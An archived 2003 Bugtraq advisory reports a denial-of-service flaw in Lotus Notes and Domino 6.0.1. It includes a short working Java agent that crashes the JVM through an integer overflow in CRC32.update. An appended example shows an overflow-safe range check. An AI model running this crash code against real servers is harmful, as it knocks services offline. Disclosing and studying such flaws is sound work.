97953 2003-04-07 18:31 /69 lines/ Marc Schoenefeld <schonef@uni-muenster.de>
Imported: 2003-04-07 18:31 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4391>
Subject: Java Agent freezes Lotus Notes and Domino 6.0.1
------------------------------------------------------------

Hi,

the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino
6.0.1 and Lotus Notes 6.0.1 to crash. After calling the agent, a huge
amount of memory is not freed and causes the server machine (observed
on MS XP) to deny further service.

IMPLICATIONS

- If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
- if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.

ANALYSIS:

The call to the "update" method of the CRC32 raises an integer overflow
in the Java java.util.zip.* core libraries which triggers a JNI routine
that cannot handle the extremely high input value.

HISTORY:

This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.

The background of this bug is described at www.illegalaccess.org

Sincerely
Marc Schoenefeld

=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;

public class JavaAgent extends AgentBase {

    public void NotesMain() {

        try {
            Session session = getSession();
            AgentContext agentContext = session.getAgentContext();
            CRC32 crc32 = new CRC32();
            // Empty array, off = 4, len = 0x7ffffffc: off + len exceeds Integer.MAX_VALUE
            crc32.update(new byte[0], 4, 0x7ffffffc);
            // (Your code goes here)

        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}
=========================Agent Source Code===========================

--
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer

(97953) /Marc Schoenefeld <schonef@uni-muenster.de>/(Rewrapped)
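
The integer overflow named in the ANALYSIS section, as an added example that is not part of the original post and is not JDK or Lotus code. The class and method names are hypothetical, and the shape of the overflow-prone range check is an assumption used for illustration; the offset and length are the values from the agent above.

```java
import java.util.zip.CRC32;

public class RangeCheckDemo {

    // Assumed shape of an overflow-prone check: off + len is evaluated in
    // 32-bit int arithmetic, so 4 + 0x7ffffffc wraps to a negative number
    // and compares as "within" any array length.
    static boolean naiveInBounds(int arrayLength, int off, int len) {
        return off >= 0 && len >= 0 && off + len <= arrayLength;
    }

    // Overflow-safe form: caller-supplied values are never added together;
    // len is compared against the space that remains after off.
    static boolean safeInBounds(int arrayLength, int off, int len) {
        return off >= 0 && len >= 0
                && off <= arrayLength && len <= arrayLength - off;
    }

    // Hypothetical defensive wrapper: reject the range in Java before
    // any native routine is handed the offset and length.
    static long checkedCrc32(byte[] buf, int off, int len) {
        if (!safeInBounds(buf.length, off, len)) {
            throw new ArrayIndexOutOfBoundsException(
                    "range off=" + off + " len=" + len
                    + " exceeds array of length " + buf.length);
        }
        CRC32 crc = new CRC32();
        crc.update(buf, off, len);
        return crc.getValue();
    }

    public static void main(String[] args) {
        int off = 4, len = 0x7ffffffc; // values from the advisory
        System.out.println("off + len as int:   " + (off + len));
        System.out.println("naive check passes: " + naiveInBounds(0, off, len));
        System.out.println("safe check passes:  " + safeInBounds(0, off, len));
        try {
            checkedCrc32(new byte[0], off, len);
        } catch (ArrayIndexOutOfBoundsException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        // A valid range on constructed sample input still works.
        byte[] sample = {'1', '2', '3', '4', '5', '6', '7', '8', '9'};
        System.out.println("crc32: " + Long.toHexString(
                checkedCrc32(sample, 0, sample.length)));
    }
}
```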